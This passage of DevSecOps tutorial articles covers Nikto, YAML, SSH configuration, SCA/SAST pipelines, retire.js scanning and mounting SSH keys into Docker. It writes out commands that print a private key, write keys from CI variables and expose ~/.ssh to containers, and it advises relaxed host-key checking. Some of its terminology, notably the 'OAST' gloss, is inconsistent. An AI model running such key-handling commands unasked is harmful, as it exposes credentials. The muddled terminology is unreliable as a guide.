| | Is CSV the only machine‑readable format? | Nikto also supports XML, HTML, and JSON (-Format json). Choose the format that integrates best with your reporting tools. | | How do I know the plugin ID for a false positive? | The scan output includes an ID column (e.g., 1010). Use that number in SKIPIDS. | Tips for a Smooth CI/CD Integration 1. Store nikto.conf in source control – ensures every pipeline run uses the same baseline. 2. Cache Nikto’s plugin database between builds to avoid re‑downloading files. 3. Fail fast – configure the CI job to abort if the scan exceeds a predefined duration (e.g., 10 minutes) and raise a warning instead of a hard failure. 4. Automate report parsing – use a small script to extract only high‑severity findings from the CSV and post them to your Slack or Teams channel. Conclusion By narrowing the scan scope, parallelizing execution, and mastering Nikto’s configuration options (SKIPPORTS, SKIPIDS, CLIOPTS), you can keep DAST scans fast, accurate, and CI‑friendly. Implement the checklist and tips above to turn security testing into a seamless part of your DevSecOps workflow—delivering rapid feedback without sacrificing coverage.
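Tip 4 above ("automate report parsing") can be sketched with the standard csv module. The column layout below is an assumption based on Nikto's common CSV order (host, ip, port, test id, method, uri, description) — verify it against the output of your Nikto version, and note that real reports may include comment lines you should skip.

```python
# Sketch: pull findings of interest out of a Nikto CSV report (tip 4).
# Assumption: columns follow the common host, ip, port, test id, method,
# uri, description order -- check your Nikto version's actual output.
import csv

FIELDS = ["host", "ip", "port", "test_id", "method", "uri", "description"]


def interesting_findings(csv_text, keywords=("XSS", "injection", "outdated")):
    """Return rows whose description mentions any of the given keywords."""
    rows = csv.DictReader(csv_text.splitlines(), fieldnames=FIELDS)
    return [
        row
        for row in rows
        if row["description"]
        and any(k.lower() in row["description"].lower() for k in keywords)
    ]
```

A short script like this can post only the filtered rows to a Slack or Teams channel instead of the full report.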

Last updated on Jan 07, 2026

YAML Formatting, SSH Configuration, and Carriage Return Characters: Essentials for DevSecOps Learners

YAML Formatting, SSH Configuration, and Carriage Return Characters: Essentials for DevSecOps Learners Understanding the fundamentals of file editing is a cornerstone of any DevSecOps workflow. Whether you are crafting CI/CD pipelines with YAML, tweaking your SSH client settings, or handling text‑file line endings, a solid grasp of these concepts prevents frustrating errors and keeps your automation reliable. This article walks you through three common topics that often appear in labs and certification exams: 1. Why YAML spacing and indentation matter 2. What the echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config command does 3. The role of carriage‑return characters (\r) in text processing Each section includes clear explanations, practical examples, and tips to help you apply the knowledge immediately. 1. YAML Formatting and Indentation – Why It’s Critical 1.1 The YAML Basics You Need to Know - YAML = “YAML Ain’t Markup Language” – a human‑readable data‑serialization format used for configuration files, CI/CD pipelines, Kubernetes manifests, and more. - Indentation defines structure – unlike JSON or XML, YAML relies on spaces (never tabs) to indicate hierarchy. A misplaced space can turn a valid file into an unreadable one. 1.2 Common Indentation Pitfalls | Symptom | Typical Cause | Quick Fix | |---------|---------------|-----------| | expected <block end> error | Inconsistent number of spaces | Use 2‑space or 4‑space indentation consistently throughout the file. | | Keys appear as strings with quotes | Unnecessary quoting of simple keys | Remove quotes unless the key contains special characters. | | “mapping values are not allowed here” | Mixing tabs and spaces | Convert all tabs to spaces (most editors have a “Convert tabs to spaces” option). 
| 1.3 Practical Example # Correct indentation (2 spaces per level) pipeline: stages: - name: Build script: | mvn clean install - name: Test script: | mvn test If the script line were indented with a tab or an extra space, the CI/CD engine would reject the file. 1.4 Tips for Maintaining Proper Indentation 1. Use an editor with YAML linting – VS Code, PyCharm, or Sublime Text can highlight indentation errors in real time. 2. Copy‑and‑paste from trusted sources – When you paste a snippet, use the “Paste as plain text” option to preserve spaces. 3. Leverage the hint button in labs – Many learning platforms provide a “Hint” that pastes correctly indented YAML directly into your terminal. 2. Understanding the SSH Config Command 2.1 Command Breakdown echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config | Part | Explanation | |------|-------------| | echo "StrictHostKeyChecking accept-new" | Prints the string StrictHostKeyChecking accept-new to standard output. | | >> | Appends the output to the file on the right side (creates the file if it doesn’t exist). | | ~/.ssh/config | The per‑user SSH client configuration file. | 2.2 What the Setting Does - StrictHostKeyChecking accept-new tells the SSH client to automatically add unknown host keys to ~/.ssh/known_hosts without prompting the user. - This is especially useful in automated pipelines where interactive prompts would stall the job. 2.3 When to Use It (and When Not to) | Scenario | Recommended? | Reason | |----------|--------------|--------| | Automated CI runners that need to SSH into fresh VMs | ✅ | Eliminates manual host‑key verification. | | Production environments with strict security policies | ❌ | Bypassing host‑key verification can expose you to man‑in‑the‑middle attacks. | | Temporary test environments | ✅ | Convenience outweighs the minimal risk. 
| 2.4 Example: Adding the Setting Safely # Ensure the .ssh directory exists and has proper permissions mkdir -p ~/.ssh chmod 700 ~/.ssh # Append the setting (creates config if missing) echo "StrictHostKeyChecking accept-new" >> ~/.ssh/config # Verify the line was added grep "StrictHostKeyChecking" ~/.ssh/config 3. Carriage Return Characters (\r) – What They Are and Why They Matter 3.1 Definition - Carriage Return (CR) – a control character represented as \r (ASCII 13). Historically, it moved the cursor back to the start of the line on a typewriter or terminal. 3.2 How CR Interacts with Line Feeds (\n) | Operating System | Typical Line Ending | |------------------|---------------------| | Windows | \r\n (CR + LF) | | Unix/Linux/macOS | \n (LF only) | | Classic Mac OS | \r (CR only) | When a file contains the wrong line ending for the platform, tools may misinterpret the content, leading to errors such as “command not found” in shell scripts. 3.3 Real‑World Scenarios - Script failures on Linux – A Bash script edited on Windows may contain \r characters, causing each line to end with an invisible \r. The shell sees #!/bin/bash\r and throws a “bad interpreter” error. - CI log clutter – Carriage returns can overwrite previous log lines, making debugging harder. 3.4 Detecting and Removing CR Characters # Show hidden characters – cat -v renders each carriage return as ^M cat -v myscript.sh | grep '\^M' # Remove CRs using dos2unix (install via package manager if needed) dos2unix myscript.sh # Alternatively, use sed sed -i 's/\r$//' myscript.sh 3.5 Best Practices - Configure your editor to use LF line endings for code that runs on Linux containers. - Add a pre‑commit hook (e.g., using pre-commit or husky) that runs dos2unix on staged files. - Validate line endings in CI pipelines with a simple grep -P '\r' step. Common Questions & Quick Tips Q1: Can I use tabs instead of spaces in YAML? A: No. YAML specifications require spaces only. Most parsers will reject files containing tabs.
Q2: Will appending StrictHostKeyChecking accept-new overwrite existing config? A: The >> operator appends; it never overwrites. If you need to replace an existing line, edit the file manually or use sed. Q3: Is it safe to remove all \r characters from a file? A: Generally, yes, for scripts and configuration files intended for Unix-like environments. Be cautious with files that deliberately use \r (e.g., legacy Windows batch files). Quick Tip Checklist - YAML: 2‑space indentation, no tabs, validate with a linter. - SSH Config: Use >> to append safely; verify with grep. - Carriage Returns: Run dos2unix before committing code that runs on Linux. Takeaway Mastering file formatting—whether it’s YAML indentation, SSH client configuration, or handling carriage returns—prevents a cascade of avoidable errors in your DevSecOps pipelines. Apply the examples and tips above in your labs, and you’ll spend less time debugging and more time building secure, automated solutions.
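Where dos2unix is unavailable (e.g., a minimal CI image), the CR cleanup from Section 3.4 can be reproduced with a short Python sketch:

```python
# Sketch: a pure-Python stand-in for dos2unix, for environments where
# the tool is not installed.

def strip_carriage_returns(text):
    """Convert CRLF (and stray lone CR) line endings to LF."""
    return text.replace("\r\n", "\n").replace("\r", "\n")


def has_carriage_returns(path):
    """Detect CR bytes in a file -- the check you'd run in CI."""
    with open(path, "rb") as fh:
        return b"\r" in fh.read()
```

To fix a script in place, read it as bytes, decode, pass it through `strip_carriage_returns`, and write it back — the same effect as `sed -i 's/\r$//'`.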

Last updated on Jan 07, 2026

Designing Secure Systems: Data Flow Diagrams, SCA/SAST Pipelines, and Local Tool Setup

Designing Secure Systems: Data Flow Diagrams, SCA/SAST Pipelines, and Local Tool Setup Creating secure, maintainable applications requires a solid foundation in three interconnected areas: visualising trust boundaries with Data Flow Diagrams (DFDs), building robust SCA (Software Component Analysis) and SAST (Static Application Security Testing) pipelines, and validating security tools locally before they hit production CI/CD. This article walks you through the essential considerations, practical steps, and best‑practice tips that every DevSecOps professional should know. 1. Data Flow Diagrams – What to Include and Where 1.1 Why DFDs Matter A DFD is a visual language that helps you communicate trust zones, component responsibilities, and data movement. There are no rigid standards dictating layout or symbols, but clarity is the only rule that truly matters. 1.2 Core Elements to Capture | Element | What to Show | Typical Placement | |---------|--------------|-------------------| | External Entities | Users, third‑party services, or any system outside your control | Outside the perimeter (e.g., “Internet”, “Partner API”) | | Trust Boundaries | Zones where security controls change (DMZ, internal network, cloud VPC) | Use distinct boxes or colour‑coded borders | | Processes / Services | APIs, micro‑services, databases, queues, etc. | Inside the appropriate trust zone | | Data Stores | Persistent storage (SQL, NoSQL, object buckets) | Usually depicted as cylinders or rectangles | | Data Flows | Directional arrows showing the movement of information | Connect entities, processes, and stores; label with data type (e.g., “JWT token”, “user credentials”) | 1.3 Practical Example Scenario: An e‑commerce platform receives orders through a public API Gateway. 
- Internet → API Gateway (trust boundary: public DMZ) - API Gateway → Order Service (internal network) - Order Service ↔ Order DB (data store) - Order Service → Payment Provider (external entity) By placing the API Gateway at the internet boundary, the diagram instantly highlights where inbound traffic is inspected, where TLS termination occurs, and where additional security controls (WAF, rate limiting) should be applied. 2. Building a Pipeline for SCA and SAST 2.1 Understanding the Scope When an exam or a real‑world requirement says “build a pipeline for SCA and SAST,” it expects you to address both frontend and backend codebases and to include secret scanning as part of the SAST step. 2.2 Recommended Pipeline Structure 1. Source Checkout – Pull the latest commit from the repository. 2. Dependency Scanning (SCA) - Frontend – Run tools like npm audit, OWASP Dependency‑Check, or Snyk against package.json/yarn.lock. - Backend – Run language‑specific scanners (e.g., Maven Dependency Plugin, pip‑audit, Gradle Dependency Check). 3. Static Code Analysis (SAST) - General SAST – Use tools such as SonarQube, Checkmarx, or CodeQL to detect vulnerable patterns. - Secret Scanning – Add a dedicated step (e.g., GitLeaks, TruffleHog, Detect Secrets) to catch API keys, passwords, or certificates embedded in the code. 4. Policy Evaluation – Fail the build if high‑severity findings exceed a defined threshold. 5. Reporting – Publish results to a dashboard, Slack channel, or pull‑request comment for developer visibility. 
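The policy-evaluation step (item 4 above) is typically a small gate script that exits non-zero when findings exceed the threshold. A minimal sketch follows; the "findings"/"severity" field names are assumptions — map them to your scanner's actual report schema.

```python
# Sketch: fail the build when high/critical findings exceed a threshold
# (step 4, Policy Evaluation). The "findings" and "severity" field names
# are assumptions -- adapt them to your scanner's JSON report schema.
import json
import sys


def violations(findings, max_high=0, max_critical=0):
    """Return a list of threshold violations (empty list = build passes)."""
    counts = {"HIGH": 0, "CRITICAL": 0}
    for f in findings:
        sev = str(f.get("severity", "")).upper()
        if sev in counts:
            counts[sev] += 1
    problems = []
    if counts["CRITICAL"] > max_critical:
        problems.append(f"critical findings: {counts['CRITICAL']} > {max_critical}")
    if counts["HIGH"] > max_high:
        problems.append(f"high findings: {counts['HIGH']} > {max_high}")
    return problems


if __name__ == "__main__":
    with open(sys.argv[1]) as fh:
        findings = json.load(fh).get("findings", [])
    problems = violations(findings, max_high=5)
    for p in problems:
        print(p)
    sys.exit(1 if problems else 0)  # non-zero exit fails the CI job
```

Because the script exits non-zero on violations, any CI system treats the gate as a failed stage without extra configuration.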
2.3 Sample YAML Snippet (GitHub Actions) name: Secure Build on: [push, pull_request] jobs: sca-frontend: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run npm audit run: npm audit --audit-level=high sca-backend: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run Maven Dependency Check run: mvn org.owasp:dependency-check-maven:check -DfailOnCVSS=7 sast: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Run CodeQL Analysis uses: github/codeql-action/analyze@v2 - name: Secret Scan with Gitleaks uses: zricethezav/gitleaks-action@v1 The pipeline clearly separates frontend SCA, backend SCA, SAST, and secret scanning, satisfying the “separate scans” requirement. 3. Local Tool Testing – Installation vs. Docker 3.1 Why Test Locally? Running a tool locally helps you: - Verify CLI arguments, environment variables, and exit codes. - Detect dependency conflicts before they break CI/CD. - Fine‑tune performance (e.g., memory limits, parallelism). 3.2 Two Integration Paths | Approach | How It Works | When to Choose It | |----------|--------------|-------------------| | Direct Installation + Scan | Install the binary or package on the build agent, then invoke it directly. | Ideal for tools that need deep OS integration (e.g., native compilers, custom plugins). | | Docker Run + Scan | Pull a pre‑built Docker image, mount the source code, and execute the scan inside the container. | Perfect for isolated environments, version‑locked tooling, or when you want a “run‑anywhere” guarantee. | 3.3 Local Test Checklist 1. Choose the integration path (installation vs. Docker). 2. Run a quick scan on a small test repo: - Verify the tool exits with 0 for clean code and non‑zero for findings. - Capture the output format (JSON, SARIF, plain text). 3. Validate CI/CD compatibility: - For installation, script the install step (apt-get, brew, pip, etc.). 
- For Docker, confirm the image size and required runtime flags (--network=none, -v $PWD:/src). 4. Document the exact command you will later copy into the pipeline YAML. 3.4 Example: Running Trivy via Docker docker run --rm -v $(pwd):/project aquasec/trivy fs /project \ --severity HIGH,CRITICAL --format sarif -o trivy-results.sarif If this command succeeds locally, you can safely embed the same Docker run step in your CI job. 4. Tips & Best Practices - Label every DFD arrow with the data type and sensitivity level (e.g., “PII – encrypted”). - Separate SCA and SAST stages to keep logs clean and make failure analysis easier. - Fail fast: set low thresholds for high‑severity findings to prevent vulnerable code from progressing. - Cache Docker images in CI to reduce build time, but always pull the latest version for security tools. - Automate secret rotation: when a secret scan flags a credential, trigger an automated rotation workflow. 5. Common Questions | Question | Answer | |----------|--------| | Do I need to draw every micro‑service on a DFD? | Focus on trust boundaries and data that crosses them. Minor internal calls can be omitted if they stay within the same security zone. | | Can I run SCA and SAST in the same CI job? | Technically possible, but separating them improves parallelism, error isolation, and report clarity. | | Is Docker the only way to avoid manual installs? | No. You can also use package managers (apt, yum, brew) or binary releases, but Docker provides the cleanest isolation for most security tools. | | What if a secret scanner flags a false positive? | Review the finding, add an allow‑list entry if it’s a known benign pattern, and document the decision in your security policy. | 6. Final Thoughts Designing secure systems is a continuous, visual, and automated effort. 
By mastering clear DFDs, constructing comprehensive SCA/SAST pipelines, and rigorously testing tools locally—whether via direct installation or Docker—you lay a strong foundation for resilient DevSecOps practices. Use the guidelines above as a checklist for every new project, and you’ll consistently deliver secure, compliant software that stands up to both exams and real‑world threats.

Last updated on Jan 06, 2026

Integrating Software Component Analysis (SCA) and OAST into Your CI/CD Build Pipeline

Introduction

Securing modern applications requires more than a single scan or a one-time review. Software Component Analysis (SCA) and Open Application Security Testing (OAST) play complementary roles in identifying vulnerabilities early and continuously. This article explains how SCA and OAST fit together, how they map to typical CI/CD jobs (build, test, and oast-frontend), and when you should run security tools directly on the host versus inside a Docker container. By the end, you'll have a clear, step-by-step guide you can copy into your own pipeline configuration.

1. Understanding the Relationship Between SCA and OAST

| Aspect | Software Component Analysis (SCA) | Open Application Security Testing (OAST) |
|--------|-----------------------------------|------------------------------------------|
| Primary focus | Identifies known vulnerabilities, license issues, and outdated versions in third-party libraries and packages. | Actively probes the running application (or its source) for security weaknesses such as XSS, SQLi, insecure configurations, and API exposure. |
| Typical output | Bill of Materials (BOM), CVE list, severity scores, remediation recommendations. | Vulnerability findings tied to code paths, request/response traces, and remediation guidance. |
| When it runs | Usually before the application is packaged—during dependency resolution or after the build step. | Typically after the application is built and optionally after functional tests, when a testable artifact exists. |
| Tool examples | Retire.js, OWASP Dependency-Check, Snyk, Black Duck. | OWASP ZAP, Burp Suite, Nikto, Arachni. |

Key takeaway: SCA secures the ingredients of your software, while OAST secures the final dish. Running both in the same pipeline gives you a holistic view of risk—first you know what you're shipping, then you verify how it behaves under attack.

2. How the Build, Test, and oast-frontend Jobs Work Together

A typical CI/CD pipeline for a web application might look like this:

stage: build → stage: test → stage: oast-frontend

2.1 Build Stage
- Goal: Compile source code, resolve dependencies, and produce an artifact (e.g., a Docker image, JAR, or static bundle).
- Typical commands: npm install, npm run build, mvn package.
- Why it matters for security: The exact versions of third-party packages are locked in, which SCA tools later analyze.

2.2 Test Stage
- Goal: Run unit, integration, and functional tests to verify business logic.
- Typical commands: npm test, pytest, go test.
- Security relevance: A clean test run ensures that any later security findings are not caused by broken functionality.

2.3 oast-frontend Stage
- Goal: Perform an OAST scan that concentrates on the frontend (JavaScript, CSS, HTML) and on the third-party dependencies used by the UI.
- Typical tool: retire.js – an SCA scanner that focuses on known vulnerable JavaScript libraries.
- What happens:
  1. The job pulls the built artifact (or the source directory).
  2. It runs retire.js against the node_modules folder.
  3. Results are saved as a JSON report (retirejs-report.json).

By placing oast-frontend after the test stage, you guarantee that the code you are scanning is the exact version that passed functional verification.

3. Running Security Tools: Docker Container vs. Local CLI

You have two common ways to invoke a tool like retire.js in a GitLab CI job:

3.1 Option 1 – Use a pre-installed image (e.g., node:alpine) and run the CLI directly

```yaml
oast-frontend:
  stage: test
  image: node:alpine3.10     # Node + npm are already available
  script:
    - npm install            # Install project dependencies
    - npm install -g retire  # Install retire.js globally
    - retire --outputformat json --outputpath retirejs-report.json --severity high
```

When to choose this:
- You need access to the host file system (e.g., node_modules created by the previous build step).
- You want to avoid extra Docker-in-Docker complexity.
- Your CI runner already provides the required runtime (Node, Python, etc.).

3.2 Option 2 – Pull a dedicated security image and run it as a container

```yaml
oast-frontend:
  stage: test
  script:
    - docker pull secfigo/retirejs
    - docker run -v $(pwd):/src secfigo/retirejs retire --outputformat json --outputpath retirejs-report.json --severity high
```

When to choose this:
- You want isolation – the scanning tool runs in its own environment, eliminating version conflicts.
- You prefer a single-purpose image that already contains the tool and its dependencies.
- Your pipeline enforces "no-install-on-host" policies for security or compliance reasons.

3.3 Decision Guidance

| Consideration | Prefer image + CLI (node:alpine) | Prefer dedicated Docker image (secfigo/retirejs) |
|---------------|----------------------------------|--------------------------------------------------|
| Speed | Faster (no extra pull) | Slightly slower (pull + container start) |
| Isolation | Lower (shares runner's filesystem) | Higher (clean environment) |
| Dependency conflicts | Possible if the runner's Node version differs | None – the image is self-contained |
| CI/CD simplicity | Simpler script, fewer commands | More explicit, easier to swap tools later |

Best practice: Start with the lightweight node:alpine approach for quick prototyping. When you move to production-grade pipelines, switch to the dedicated Docker image to guarantee reproducibility and compliance.

4. Practical Example: Full GitLab CI Configuration

```yaml
stages:
  - build
  - test
  - oast-frontend

# ---------- Build ----------
build-app:
  stage: build
  image: node:alpine3.10
  script:
    - npm ci          # Clean install, generates node_modules
    - npm run build   # Produce dist/ folder
  artifacts:
    paths:
      - node_modules/
      - dist/
    expire_in: 1 hour

# ---------- Test ----------
unit-test:
  stage: test
  image: node:alpine3.10
  script:
    - npm test
  dependencies:
    - build-app

# ---------- OAST Frontend ----------
oast-frontend:
  stage: oast-frontend
  image: node:alpine3.10   # Switch to secfigo/retirejs for production
  script:
    - npm install -g retire
    - retire --outputformat json --outputpath retirejs-report.json --severity high
  artifacts:
    paths:
      - retirejs-report.json
    expire_in: 2 days
  dependencies:
    - build-app
```

The dependencies keyword ensures each job receives the exact node_modules produced by the build step, keeping the SCA scan accurate.

5. Tips & Common Questions

✅ Tips for a Smooth Integration
1. Cache node_modules – use the CI cache feature to speed up subsequent runs.
2. Fail fast – keep allow_failure: false (the default) on the scan job and have its script exit non-zero when the report exceeds your severity threshold, so the pipeline aborts immediately.
3. Version pinning – explicitly set the retire.js version in the Docker image tag (e.g., secfigo/retirejs:2.3.0) to avoid surprise updates.

❓ Common Questions

| Question | Answer |
|----------|--------|
| Do I need both SCA and OAST? | Yes. SCA finds known library issues; OAST uncovers runtime flaws that libraries alone cannot reveal. |
| Can I run retire.js without Docker on a Windows runner? | Absolutely. Install Node, run npm install -g retire, then execute the same CLI command. |
| What if my pipeline runner doesn't have Docker installed? | Use the image: approach (Option 1). The tool runs directly in the runner's environment. |
| How do I treat the retirejs-report.json? | Publish it as an artifact, feed it into a security dashboard, or add a script that parses the JSON and fails the job if any "high" severity findings exist. |
| Why does the Docker container sometimes break the pipeline? | The container runs as a non-root user by default, which may lack permission to write to the mounted workspace. Add --user $(id -u):$(id -g) to the docker run command if needed. |

Conclusion

Combining Software Component Analysis and Open Application Security Testing within a single CI/CD pipeline gives you early visibility into both what you ship and how it behaves under attack. By sequencing the build → test → oast-frontend stages, you ensure that each security scan works on the exact artifact that passed functional verification. Choose the execution method that matches your organization's security posture: the lightweight node:alpine image for speed and simplicity, or a dedicated Docker image for isolation and reproducibility. With the example configuration and tips provided, you can now embed robust SCA and OAST checks into any modern DevSecOps workflow.
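As a concrete follow-up to the FAQ's suggestion of a report-parsing gate, here is a minimal sketch in Python. The data → results → vulnerabilities layout is an assumption based on recent retire.js versions, and the function names are illustrative; verify the field names against your own report before relying on it:

```python
import json
import sys

# Severities that should block the pipeline.
FAIL_ON = {"high", "critical"}

def count_findings(report):
    """Count vulnerabilities in a retire.js JSON report whose severity is in FAIL_ON."""
    total = 0
    for entry in report.get("data", []):            # one entry per scanned file
        for result in entry.get("results", []):     # one result per detected library
            for vuln in result.get("vulnerabilities", []):
                if vuln.get("severity", "").lower() in FAIL_ON:
                    total += 1
    return total

def gate(report_path="retirejs-report.json"):
    """Exit non-zero when the report contains blocking findings."""
    with open(report_path) as fh:
        findings = count_findings(json.load(fh))
    if findings:
        print(f"{findings} high/critical finding(s) - failing the job")
        sys.exit(1)
    print("No blocking findings")
```

In the oast-frontend job you could invoke this as an extra script step after the retire command (e.g., `python3 check_report.py`, a hypothetical filename), keeping `allow_failure: false` so the non-zero exit stops the pipeline.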

Last updated on Jan 06, 2026

SSH Key Management in the DevSecOps Box – How It Works, Where It’s Configured, and What You Need to Know

Managing SSH keys is a core part of any DevSecOps lab. In the DevSecOps Box you can connect to the production environment without specifying a key file each time, and you may wonder why this works, where the configuration lives, and what tools like ssh-agent and ssh-add actually do. This article breaks down the mechanics, points you to the relevant files, and provides practical tips for customizing the setup for your own labs.

Table of Contents
1. Why the DevSecOps Box Can SSH to Production Without Extra Flags
2. Where the Private Key Is Stored
3. How SSH Chooses the Correct Key for a Host
4. Configuring Your Own Key Pair
5. The Role of ssh-agent and ssh-add
6. Common Questions & Quick Tips

Why the DevSecOps Box Can SSH to Production Without Extra Flags

The lab is deliberately pre-configured so that the root user on the DevSecOps Box already possesses a private key that matches a public key stored on the production host. When you run a plain ssh prod-host, OpenSSH automatically looks for a private key in the default location (~/.ssh/id_rsa). Because the matching key is present, authentication succeeds without the -i /path/to/key option.

Key point: As long as the private key exists at /root/.ssh/id_rsa, the box can reach the production machine. Delete or replace that file and the password-less login will stop working.

Where the Private Key Is Stored

| Path | Owner | Purpose |
|------|-------|---------|
| /root/.ssh/id_rsa | root | Default RSA private key used for all lab SSH connections |
| /root/.ssh/id_rsa.pub | root | Corresponding public key (added to authorized_keys on the remote host) |
| /root/.ssh/authorized_keys (on the remote host) | root | List of public keys that are allowed to log in |

If you inspect the box:

```bash
# Show the private key (redacted for security)
cat /root/.ssh/id_rsa

# Verify the public key that the prod host trusts
ssh prod-host "cat /root/.ssh/authorized_keys"
```

Removing /root/.ssh/id_rsa breaks the automatic login.

How SSH Chooses the Correct Key for a Host

OpenSSH follows a simple lookup order:
1. Explicit key via the -i flag – overrides everything else.
2. Keys listed in ~/.ssh/config under a Host stanza (e.g., IdentityFile).
3. Default key files (~/.ssh/id_rsa, id_ecdsa, id_ed25519, …).

In the DevSecOps Box there is no custom ~/.ssh/config; the system relies on step 3. When you first connect to a new host, SSH asks you to confirm the host's fingerprint (the "host verification" prompt). After you accept, the connection proceeds, and the remote SSH daemon checks whether the presented public key (derived from the private key you offered) appears in its authorized_keys file.

If you need a per-host key mapping, create a config file:

```bash
cat > /root/.ssh/config <<'EOF'
Host prod
    HostName 10.0.0.5
    User root
    IdentityFile /root/.ssh/prod_id_rsa
EOF
chmod 600 /root/.ssh/config
```

Now ssh prod will automatically use /root/.ssh/prod_id_rsa.

Configuring Your Own Key Pair

1. Generate a new RSA (or Ed25519) key pair:

```bash
ssh-keygen -t rsa -b 4096 -f /root/.ssh/my_lab_key -N ""   # -N "" = no passphrase
```

2. Copy the public key to the remote host:

```bash
ssh-copy-id -i /root/.ssh/my_lab_key.pub root@prod-host
```

or manually append the key to /root/.ssh/authorized_keys on the remote side.

3. Tell SSH which key to use (optional but recommended for multiple keys):

```bash
echo -e "Host prod\n    IdentityFile /root/.ssh/my_lab_key" >> /root/.ssh/config
chmod 600 /root/.ssh/config
```

Now you can connect with ssh prod just as before, but the lab uses your own credentials.

The Role of ssh-agent and ssh-add

- ssh-agent is a background process that holds private keys in memory, allowing you to use them without re-entering a passphrase for each connection.
- ssh-add loads a private key into the running agent:

```bash
eval "$(ssh-agent -s)"          # start the agent
ssh-add /root/.ssh/my_lab_key   # load the key
```

In CI pipelines (e.g., GitLab CI) you'll often see a snippet like:

```yaml
before_script:
  - mkdir -p ~/.ssh
  - echo "$DEPLOYMENT_SERVER_SSH_PRIVKEY" | tr -d '\r' > ~/.ssh/id_rsa
  - chmod 600 ~/.ssh/id_rsa
  - eval "$(ssh-agent -s)"
  - ssh-add ~/.ssh/id_rsa
```

This sequence creates the key file from a protected variable, starts an agent, and adds the key so subsequent ssh or scp commands run without interactive prompts.

Bottom line: In the DevSecOps Box you don't need ssh-agent for the default key because the key is unencrypted and stored at the default location. You only need an agent when the key is passphrase-protected or when you want to manage multiple keys securely.

Common Questions & Quick Tips

| Question | Short Answer |
|----------|--------------|
| Why does killing ssh-agent not affect my login? | The default key (/root/.ssh/id_rsa) is unencrypted and read directly by ssh; the agent is only required for passphrase-protected keys. |
| Where can I see which key is being offered? | Run ssh -v prod-host; the verbose output shows lines like Offering public key: /root/.ssh/id_rsa. |
| Can I store keys outside /root/.ssh? | Yes—place the key anywhere and reference it with -i /path/to/key or via an IdentityFile entry in ~/.ssh/config. |
| Do I need to restart the box after changing keys? | No. SSH reads the key file each time a connection is made. Just replace the file and ensure correct permissions (600). |
| How do I secure the private key in production? | Use a passphrase, store it in a secret manager, and load it into ssh-agent at runtime (as shown in the CI example). |

TL;DR
- The DevSecOps Box authenticates to production using the default private key at /root/.ssh/id_rsa.
- No explicit configuration file is required; OpenSSH falls back to this default location.
- To use a different key or multiple hosts, create a ~/.ssh/config file with IdentityFile directives.
- ssh-agent and ssh-add are only needed for passphrase-protected keys or when you want to avoid typing passphrases repeatedly.

With this knowledge you can safely modify the lab's SSH setup, add your own keys, and understand exactly how authentication works under the hood. Happy securing!
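The permission advice above (mode 600 on key and config files) can also be checked from a script. Here is a minimal sketch, assuming a POSIX system; the function name is illustrative. Rather than demanding exactly 600, it mirrors what OpenSSH actually enforces: no group or other access at all, so chmod 400 also passes.

```python
import os
import stat

def key_permissions_ok(path):
    """Return True when the file is not accessible by group or other.

    OpenSSH refuses to use private keys that are group/other readable,
    so this masks out the owner bits and requires the rest to be zero.
    """
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (mode & 0o077) == 0
```

Running it against /root/.ssh/id_rsa (or your own key path) before a lab session is a quick way to catch a stray chmod that would otherwise surface as a confusing "bad permissions" SSH error.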

Last updated on Jan 07, 2026

Mounting SSH Keys in Docker Containers: Why and How to Use Volume Bind‑Mounts with the `-i` Flag

When you run security or compliance scans inside a Docker container, you often need to connect to remote hosts over SSH. A common pattern is to combine the -i option (to point to a private key) with one or more -v volume mounts that expose your local ~/.ssh directory and the current working directory to the container. This article explains why both are required, breaks down each part of the command, and provides practical guidance for using SSH keys safely and efficiently in Docker-based DevSecOps workflows.

Table of Contents
1. Understanding the docker run command
2. Why mount ~/.ssh as a volume?
3. The role of the -i flag
4. Why two -v flags?
5. Step-by-step example
6. Best practices & security tips
7. Common questions

Understanding the docker run command

A typical invocation for running the InSpec Docker image against a remote server looks like this:

```bash
docker run --rm \
  -v ~/.ssh:/root/.ssh \
  -v $(pwd):/share \
  hysnsec/inspec exec https://github.com/dev-sec/linux-baseline.git \
  -t ssh://root@$DEPLOYMENT_SERVER \
  -i ~/.ssh/id_rsa \
  --chef-license accept
```

| Segment | Purpose |
|---------|---------|
| --rm | Remove the container automatically when it exits. |
| -v ~/.ssh:/root/.ssh | Bind-mount the host's SSH directory into the container. |
| -v $(pwd):/share | Share the current host directory (e.g., test files, profiles) with the container. |
| hysnsec/inspec | Docker image that contains the InSpec scanner. |
| exec … | InSpec command to run a compliance profile from GitHub. |
| -t ssh://root@$DEPLOYMENT_SERVER | Target the remote host via SSH. |
| -i ~/.ssh/id_rsa | Path to the private key inside the container. |
| --chef-license accept | Auto-accept the Chef license required by InSpec. |

Why mount ~/.ssh as a volume?

1. Provides the full SSH configuration. The -i flag only points to a single private key file. Real-world SSH setups often rely on additional files:
   - ~/.ssh/config (host aliases, proxy commands, preferred algorithms)
   - ~/.ssh/known_hosts (pre-trusted fingerprints)
   - Additional keys (id_ecdsa, id_ed25519, etc.)
   Mounting the entire ~/.ssh directory makes all of these files available to the container, ensuring the SSH client inside Docker behaves exactly like the one on your host.

2. Keeps the path consistent. Inside the container the default user is root, whose home directory is /root. By mapping ~/.ssh to /root/.ssh, the container's SSH client automatically finds the keys without needing to adjust environment variables or copy files manually.

3. Avoids copy-and-paste errors. If you only passed -i ~/.ssh/id_rsa, you would still need to copy the key into the container's filesystem or set SSH_AUTH_SOCK. A bind-mount is a single, declarative step that guarantees the key is present where the SSH client expects it.

The role of the -i flag

- Scope: Tells InSpec (or any underlying SSH client) which private key to use for authentication inside the container.
- Syntax: -i /path/to/key – the path is evaluated relative to the container's filesystem.
- Why it still matters: Even though the whole .ssh directory is mounted, InSpec does not automatically select a key. Explicitly specifying -i removes ambiguity, especially when multiple keys exist.

Bottom line: -v ~/.ssh:/root/.ssh makes the key available; -i ~/.ssh/id_rsa tells the tool which key to use.

Why two -v flags?

Docker allows multiple volume bind-mounts in a single docker run. Each -v maps a distinct host path to a distinct container path:

| Flag | Host path | Container path | Typical use case |
|------|-----------|----------------|------------------|
| -v ~/.ssh:/root/.ssh | Your local SSH configuration (~/.ssh) | /root/.ssh (root's home) | Provide SSH keys & config |
